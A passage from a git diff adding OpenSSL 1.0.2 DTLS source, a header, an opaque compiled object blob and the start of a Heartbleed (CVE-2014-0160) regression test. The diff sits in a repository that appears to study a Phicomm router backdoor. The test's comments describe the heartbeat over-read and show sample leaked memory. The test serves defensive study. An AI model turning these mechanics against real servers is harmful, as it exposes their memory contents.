+            SSLerr(SSL_F_DTLS1_SEND_HELLO_VERIFY_REQUEST,
+                   ERR_R_INTERNAL_ERROR);
+            return 0;
+        }
+
+        *(p++) = (unsigned char)s->d1->cookie_len;
+        memcpy(p, s->d1->cookie, s->d1->cookie_len);
+        p += s->d1->cookie_len;
+        msg_len = p - msg;
+
+        dtls1_set_message_header(s, buf,
+                                 DTLS1_MT_HELLO_VERIFY_REQUEST, msg_len, 0,
+                                 msg_len);
+
+        s->state = DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B;
+        /* number of bytes to write */
+        s->init_num = p - buf;
+        s->init_off = 0;
+    }
+
+    /* s->state = DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B */
+    return (dtls1_do_write(s, SSL3_RT_HANDSHAKE));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srvr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_srvr.o
new file mode 100644
index 0000000000000000000000000000000000000000..2a901bffc59b7869210cbc6eaccaa570c0cba86d
GIT binary patch
literal 12728
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/dtls1.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/dtls1.h
new file mode 100644
index 0000000..4af7e4a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/dtls1.h
@@ -0,0 +1,271 @@
+/* ssl/dtls1.h */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_DTLS1_H
+# define HEADER_DTLS1_H
+
+# include <openssl/buffer.h>
+# include <openssl/pqueue.h>
+# ifdef OPENSSL_SYS_VMS
+#  include <resource.h>
+#  include <sys/timeb.h>
+# endif
+# ifdef OPENSSL_SYS_WIN32
+/* Needed for struct timeval */
+#  include <winsock.h>
+# elif defined(OPENSSL_SYS_NETWARE) && !defined(_WINSOCK2API_)
+#  include <sys/timeval.h>
+# else
+#  if defined(OPENSSL_SYS_VXWORKS)
+#   include <sys/times.h>
+#  else
+#   include <sys/time.h>
+#  endif
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# define DTLS1_VERSION                   0xFEFF
+# define DTLS1_2_VERSION                 0xFEFD
+# define DTLS_MAX_VERSION                DTLS1_2_VERSION
+
+# define DTLS1_BAD_VER                   0x0100
+
+/* Special value for method supporting multiple versions */
+# define DTLS_ANY_VERSION                0x1FFFF
+
+# if 0
+/* this alert description is not specified anywhere... */
+#  define DTLS1_AD_MISSING_HANDSHAKE_MESSAGE    110
+# endif
+
+/* lengths of messages */
+# define DTLS1_COOKIE_LENGTH                     256
+
+# define DTLS1_RT_HEADER_LENGTH                  13
+
+# define DTLS1_HM_HEADER_LENGTH                  12
+
+# define DTLS1_HM_BAD_FRAGMENT                   -2
+# define DTLS1_HM_FRAGMENT_RETRY                 -3
+
+# define DTLS1_CCS_HEADER_LENGTH                  1
+
+# ifdef DTLS1_AD_MISSING_HANDSHAKE_MESSAGE
+#  define DTLS1_AL_HEADER_LENGTH                   7
+# else
+#  define DTLS1_AL_HEADER_LENGTH                   2
+# endif
+
+# ifndef OPENSSL_NO_SSL_INTERN
+
+#  ifndef OPENSSL_NO_SCTP
+#   define DTLS1_SCTP_AUTH_LABEL   "EXPORTER_DTLS_OVER_SCTP"
+#  endif
+
+/* Max MTU overhead we know about so far is 40 for IPv6 + 8 for UDP */
+#  define DTLS1_MAX_MTU_OVERHEAD                   48
+
+typedef struct dtls1_bitmap_st {
+    unsigned long map;          /* track 32 packets on 32-bit systems and 64
+                                 * - on 64-bit systems */
+    unsigned char max_seq_num[8]; /* max record number seen so far, 64-bit
+                                   * value in big-endian encoding */
+} DTLS1_BITMAP;
+
+struct dtls1_retransmit_state {
+    EVP_CIPHER_CTX *enc_write_ctx; /* cryptographic state */
+    EVP_MD_CTX *write_hash;     /* used for mac generation */
+#  ifndef OPENSSL_NO_COMP
+    COMP_CTX *compress;         /* compression */
+#  else
+    char *compress;
+#  endif
+    SSL_SESSION *session;
+    unsigned short epoch;
+};
+
+struct hm_header_st {
+    unsigned char type;
+    unsigned long msg_len;
+    unsigned short seq;
+    unsigned long frag_off;
+    unsigned long frag_len;
+    unsigned int is_ccs;
+    struct dtls1_retransmit_state saved_retransmit_state;
+};
+
+struct ccs_header_st {
+    unsigned char type;
+    unsigned short seq;
+};
+
+struct dtls1_timeout_st {
+    /* Number of read timeouts so far */
+    unsigned int read_timeouts;
+    /* Number of write timeouts so far */
+    unsigned int write_timeouts;
+    /* Number of alerts received so far */
+    unsigned int num_alerts;
+};
+
+typedef struct record_pqueue_st {
+    unsigned short epoch;
+    pqueue q;
+} record_pqueue;
+
+typedef struct hm_fragment_st {
+    struct hm_header_st msg_header;
+    unsigned char *fragment;
+    unsigned char *reassembly;
+} hm_fragment;
+
+typedef struct dtls1_state_st {
+    unsigned int send_cookie;
+    unsigned char cookie[DTLS1_COOKIE_LENGTH];
+    unsigned char rcvd_cookie[DTLS1_COOKIE_LENGTH];
+    unsigned int cookie_len;
+    /*
+     * The current data and handshake epoch.  This is initially
+     * undefined, and starts at zero once the initial handshake is
+     * completed
+     */
+    unsigned short r_epoch;
+    unsigned short w_epoch;
+    /* records being received in the current epoch */
+    DTLS1_BITMAP bitmap;
+    /* renegotiation starts a new set of sequence numbers */
+    DTLS1_BITMAP next_bitmap;
+    /* handshake message numbers */
+    unsigned short handshake_write_seq;
+    unsigned short next_handshake_write_seq;
+    unsigned short handshake_read_seq;
+    /* save last sequence number for retransmissions */
+    unsigned char last_write_sequence[8];
+    /* Received handshake records (processed and unprocessed) */
+    record_pqueue unprocessed_rcds;
+    record_pqueue processed_rcds;
+    /* Buffered handshake messages */
+    pqueue buffered_messages;
+    /* Buffered (sent) handshake records */
+    pqueue sent_messages;
+    /*
+     * Buffered application records. Only for records between CCS and
+     * Finished to prevent either protocol violation or unnecessary message
+     * loss.
+     */
+    record_pqueue buffered_app_data;
+    /* Is set when listening for new connections with dtls1_listen() */
+    unsigned int listen;
+    unsigned int link_mtu;      /* max on-the-wire DTLS packet size */
+    unsigned int mtu;           /* max DTLS packet size */
+    struct hm_header_st w_msg_hdr;
+    struct hm_header_st r_msg_hdr;
+    struct dtls1_timeout_st timeout;
+    /*
+     * Indicates when the last handshake msg or heartbeat sent will timeout
+     */
+    struct timeval next_timeout;
+    /* Timeout duration */
+    unsigned short timeout_duration;
+    /*
+     * storage for Alert/Handshake protocol data received but not yet
+     * processed by ssl3_read_bytes:
+     */
+    unsigned char alert_fragment[DTLS1_AL_HEADER_LENGTH];
+    unsigned int alert_fragment_len;
+    unsigned char handshake_fragment[DTLS1_HM_HEADER_LENGTH];
+    unsigned int handshake_fragment_len;
+    unsigned int retransmitting;
+    /*
+     * Set when the handshake is ready to process peer's ChangeCipherSpec message.
+     * Cleared after the message has been processed.
+     */
+    unsigned int change_cipher_spec_ok;
+#  ifndef OPENSSL_NO_SCTP
+    /* used when SSL_ST_XX_FLUSH is entered */
+    int next_state;
+    int shutdown_received;
+#  endif
+} DTLS1_STATE;
+
+typedef struct dtls1_record_data_st {
+    unsigned char *packet;
+    unsigned int packet_length;
+    SSL3_BUFFER rbuf;
+    SSL3_RECORD rrec;
+#  ifndef OPENSSL_NO_SCTP
+    struct bio_dgram_sctp_rcvinfo recordinfo;
+#  endif
+} DTLS1_RECORD_DATA;
+
+# endif
+
+/* Timeout multipliers (timeout slice is defined in apps/timeouts.h */
+# define DTLS1_TMO_READ_COUNT                      2
+# define DTLS1_TMO_WRITE_COUNT                     2
+
+# define DTLS1_TMO_ALERT_COUNT                     12
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/heartbeat_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/heartbeat_test.c
new file mode 100644
index 0000000..7623c36
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/heartbeat_test.c
@@ -0,0 +1,474 @@
+/* test/heartbeat_test.c */
+/*-
+ * Unit test for TLS heartbeats.
+ *
+ * Acts as a regression test against the Heartbleed bug (CVE-2014-0160).
+ *
+ * Author:  Mike Bland (mbland@acm.org, http://mike-bland.com/)
+ * Date:    2014-04-12
+ * License: Creative Commons Attribution 4.0 International (CC By 4.0)
+ *          http://creativecommons.org/licenses/by/4.0/deed.en_US
+ *
+ * OUTPUT
+ * ------
+ * The program returns zero on success. It will print a message with a count
+ * of the number of failed tests and return nonzero if any tests fail.
+ *
+ * It will print the contents of the request and response buffers for each
+ * failing test. In a "fixed" version, all the tests should pass and there
+ * should be no output.
+ *
+ * In a "bleeding" version, you'll see:
+ *
+ *   test_dtls1_heartbleed failed:
+ *     expected payload len: 0
+ *     received: 1024
+ *   sent 26 characters
+ *     "HEARTBLEED                "
+ *   received 1024 characters
+ *     "HEARTBLEED                \xde\xad\xbe\xef..."
+ *   ** test_dtls1_heartbleed failed **
+ *
+ * The contents of the returned buffer in the failing test will depend on the
+ * contents of memory on your machine.
+ *
+ * MORE INFORMATION
+ * ----------------
+ * http://mike-bland.com/2014/04/12/heartbleed.html
+ * http://mike-bland.com/tags/heartbleed.html
+ */
+
+#define OPENSSL_UNIT_TEST
+
+#include "../test/testutil.h"
+
+#include "../ssl/ssl_locl.h"
+#include <ctype.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#if !defined(OPENSSL_NO_HEARTBEATS) && !defined(OPENSSL_NO_UNIT_TEST)
+
+/* As per https://tools.ietf.org/html/rfc6520#section-4 */
+# define MIN_PADDING_SIZE        16
+
+/* Maximum number of payload characters to print as test output */
+# define MAX_PRINTABLE_CHARACTERS        1024
+
+typedef struct heartbeat_test_fixture {
+    SSL_CTX *ctx;
+    SSL *s;
+    const char *test_case_name;
+    int (*process_heartbeat) (SSL *s);
+    unsigned char *payload;
+    int sent_payload_len;
+    int expected_return_value;
+    int return_payload_offset;
+    int expected_payload_len;
+    const char *expected_return_payload;
+} HEARTBEAT_TEST_FIXTURE;
+
+static HEARTBEAT_TEST_FIXTURE set_up(const char *const test_case_name,
+                                     const SSL_METHOD *meth)
+{
+    HEARTBEAT_TEST_FIXTURE fixture;
+    int setup_ok = 1;
+    memset(&fixture, 0, sizeof(fixture));
+    fixture.test_case_name = test_case_name;
+
+    fixture.ctx = SSL_CTX_new(meth);
+    if (!fixture.ctx) {
+        fprintf(stderr, "Failed to allocate SSL_CTX for test: %s\n",
+                test_case_name);
+        setup_ok = 0;
+        goto fail;
+    }
+
+    fixture.s = SSL_new(fixture.ctx);
+    if (!fixture.s) {
+        fprintf(stderr, "Failed to allocate SSL for test: %s\n",
+                test_case_name);
+        setup_ok = 0;
+        goto fail;
+    }
+
+    if (!ssl_init_wbio_buffer(fixture.s, 1)) {
+        fprintf(stderr, "Failed to set up wbio buffer for test: %s\n",
+                test_case_name);
+        setup_ok = 0;
+        goto fail;
+    }
+
+    if (!ssl3_setup_buffers(fixture.s)) {
+        fprintf(stderr, "Failed to setup buffers for test: %s\n",
+                test_case_name);
+        setup_ok = 0;
+        goto fail;
+    }
+
+    /*
+     * Clear the memory for the return buffer, since this isn't automatically
+     * zeroed in opt mode and will cause spurious test failures that will
+     * change with each execution.
+     */
+    memset(fixture.s->s3->wbuf.buf, 0, fixture.s->s3->wbuf.len);
+
+ fail:
+    if (!setup_ok) {
+        ERR_print_errors_fp(stderr);
+        exit(EXIT_FAILURE);
+    }
+    return fixture;
+}
+
+static HEARTBEAT_TEST_FIXTURE set_up_dtls(const char *const test_case_name)
+{
+    HEARTBEAT_TEST_FIXTURE fixture = set_up(test_case_name,
+                                            DTLSv1_server_method());
+    fixture.process_heartbeat = dtls1_process_heartbeat;
+
+    /*
+     * As per dtls1_get_record(), skipping the following from the beginning
+     * of the returned heartbeat message: type-1 byte; version-2 bytes;
+     * sequence number-8 bytes; length-2 bytes And then skipping the 1-byte
+     * type encoded by process_heartbeat for a total of 14 bytes, at which
+     * point we can grab the length and the payload we seek.
+     */
+    fixture.return_payload_offset = 14;
+    return fixture;
+}
+
+/* Needed by ssl3_write_bytes() */
+static int dummy_handshake(SSL *s)
+{
+    return 1;
+}
+
+static HEARTBEAT_TEST_FIXTURE set_up_tls(const char *const test_case_name)
+{
+    HEARTBEAT_TEST_FIXTURE fixture = set_up(test_case_name,
+                                            TLSv1_server_method());
+    fixture.process_heartbeat = tls1_process_heartbeat;
+    fixture.s->handshake_func = dummy_handshake;
+
+    /*
+     * As per do_ssl3_write(), skipping the following from the beginning of
+     * the returned heartbeat message: type-1 byte; version-2 bytes; length-2
+     * bytes And then skipping the 1-byte type encoded by process_heartbeat
+     * for a total of 6 bytes, at which point we can grab the length and the
+     * payload we seek.
+     */
+    fixture.return_payload_offset = 6;
+    return fixture;
+}
+
+static void tear_down(HEARTBEAT_TEST_FIXTURE fixture)
+{
+    ERR_print_errors_fp(stderr);
+    SSL_free(fixture.s);
+    SSL_CTX_free(fixture.ctx);
+}
+
+static void print_payload(const char *const prefix,
+                          const unsigned char *payload, const int n)
+{
+    const int end = n < MAX_PRINTABLE_CHARACTERS ? n
+        : MAX_PRINTABLE_CHARACTERS;
+    int i = 0;
+
+    printf("%s %d character%s", prefix, n, n == 1 ? "" : "s");
+    if (end != n)
+        printf(" (first %d shown)", end);
+    printf("\n  \"");
+
+    for (; i != end; ++i) {
+        const unsigned char c = payload[i];
+        if (isprint(c))
+            fputc(c, stdout);
+        else
+            printf("\\x%02x", c);
+    }
+    printf("\"\n");
+}
+
+static int execute_heartbeat(HEARTBEAT_TEST_FIXTURE fixture)
+{
+    int result = 0;
+    SSL *s = fixture.s;
+    unsigned char *payload = fixture.payload;
+    unsigned char sent_buf[MAX_PRINTABLE_CHARACTERS + 1];
+    int return_value;
+    unsigned const char *p;
+    int actual_payload_len;
+
+    s->s3->rrec.data = payload;
+    s->s3->rrec.length = strlen((const char *)payload);
+    *payload++ = TLS1_HB_REQUEST;
+    s2n(fixture.sent_payload_len, payload);
+
+    /*
+     * Make a local copy of the request, since it gets overwritten at some
+     * point
+     */
+    memcpy((char *)sent_buf, (const char *)payload, sizeof(sent_buf));
+
+    return_value = fixture.process_heartbeat(s);
+
+    if (return_value != fixture.expected_return_value) {
+        printf("%s failed: expected return value %d, received %d\n",
+               fixture.test_case_name, fixture.expected_return_value,
+               return_value);
+        result = 1;
+    }
+
+    /*
+     * If there is any byte alignment, it will be stored in wbuf.offset.
+     */
+    p = &(s->s3->
+          wbuf.buf[fixture.return_payload_offset + s->s3->wbuf.offset]);
+    actual_payload_len = 0;
+    n2s(p, actual_payload_len);
+
+    if (actual_payload_len != fixture.expected_payload_len) {
+        printf("%s failed:\n  expected payload len: %d\n  received: %d\n",
+               fixture.test_case_name, fixture.expected_payload_len,
+               actual_payload_len);
+        print_payload("sent", sent_buf, strlen((const char *)sent_buf));
+        print_payload("received", p, actual_payload_len);
+        result = 1;
+    } else {
+        char *actual_payload =
+            BUF_strndup((const char *)p, actual_payload_len);
+        if (strcmp(actual_payload, fixture.expected_return_payload) != 0) {
+            printf
+                ("%s failed:\n  expected payload: \"%s\"\n  received: \"%s\"\n",
+                 fixture.test_case_name, fixture.expected_return_payload,
+                 actual_payload);
+            result = 1;
+        }
+        OPENSSL_free(actual_payload);
+    }
+
+    if (result != 0) {
+        printf("** %s failed **\n--------\n", fixture.test_case_name);
+    }
+    return result;
+}
+
+static int honest_payload_size(unsigned char payload_buf[])
+{
+    /* Omit three-byte pad at the beginning for type and payload length */
+    return strlen((const char *)&payload_buf[3]) - MIN_PADDING_SIZE;
+}
+
+# define SETUP_HEARTBEAT_TEST_FIXTURE(type)\
+  SETUP_TEST_FIXTURE(HEARTBEAT_TEST_FIXTURE, set_up_##type)
+
+# define EXECUTE_HEARTBEAT_TEST()\
+  EXECUTE_TEST(execute_heartbeat, tear_down)
+
+static int test_dtls1_not_bleeding()
+{
